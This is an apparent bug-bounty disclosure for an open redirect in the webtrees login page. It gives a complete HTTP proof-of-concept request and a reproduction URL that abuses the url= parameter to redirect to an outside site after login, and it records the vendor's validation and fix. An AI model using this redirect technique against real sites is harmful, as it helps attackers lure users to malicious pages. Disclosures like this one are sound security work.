Open Redirect in fisharebest/webtrees

Valid

Reported on

Sep 28th 2021


Description

OpenRedirect at login with parameter &url=

Proof of Concept

// PoC.request
POST /demo-stable/index.php?route=%2Fdemo-stable%2Flogin%2Fdemo HTTP/2
Host: dev.webtrees.net
Cookie: __Secure-WT-ID=ekks8678620p55do7do21jd4p1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://dev.webtrees.net/
Content-Type: application/x-www-form-urlencoded
Content-Length: 99
Origin: https://dev.webtrees.net
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers

_csrf=o57ZmYPF0fQhPhLNSs3ICWiKzwnj9wFt&url=https%3A%2F%2Fgoogle.com&username=editor&password=editor

Step to Reproduct

Access login with url: https://dev.webtrees.net/demo-stable/index.php?route=%2Fdemo-stable%2Flogin%2Fdemo&url=https://google.com

After login success it will redirect to google.com

Impact

This functionality is not restricted to relative URLs within the application and could be leveraged by an attacker to fool an end user into believing that a malicious URL they were redirected to is valid.

We have contacted a member of the fisharebest/webtrees team and are waiting to hear back a month ago
Greg Roach validated this vulnerability a month ago
lethanhphuc has been awarded the disclosure bounty
The fix bounty is now up for grabs
Greg Roach confirmed that a fix has been merged on 551ad4 a month ago
Greg Roach has been awarded the fix bounty